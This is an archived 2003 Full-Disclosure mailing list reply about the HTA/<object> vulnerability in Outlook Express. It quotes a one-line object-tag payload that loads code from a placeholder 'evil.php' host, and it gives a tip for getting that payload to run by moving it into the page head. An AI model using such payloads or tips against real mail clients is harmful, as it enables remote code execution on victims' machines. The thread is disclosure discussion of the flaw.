[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] HTA/<object> vulnerability

To: <full-disclosure@xxxxxxxxxxxxxxxx>, <titus@xxxxxxxx>
Subject: Re: [Full-Disclosure] HTA/<object> vulnerability
From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
Date: Wed, 10 Sep 2003 08:30:06 -0700

> Has anyone has been able to confirm that the HTA/<object> tag vulnerability
> is exploitable in Outlook and Outlook express?  The EEYE advisory states
> that its possible but I haven't seen it work.  The following does not
> work.
> 
> <div style.none><object data="http://server/evil.php";></object></div>

in my observance, at least OE, even if you get an ActiveX warning,
 the exploit still runs and executes the dropped code.
try placing the tag in the <head> tag </head>.

morning_wood 

note: if anyone wishes a test mail, let me know

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] HTA/<object> vulnerability
  - From: titus

Prev by Date: RE: [Full-Disclosure] 9/11 virus
Next by Date: [Full-Disclosure] HTA/<object> vulnerability
Previous by thread: [Full-Disclosure] HTA/<object> vulnerability
Next by thread: RE: [Full-Disclosure] HTA/<object> vulnerability
Index(es):
- Date
- Thread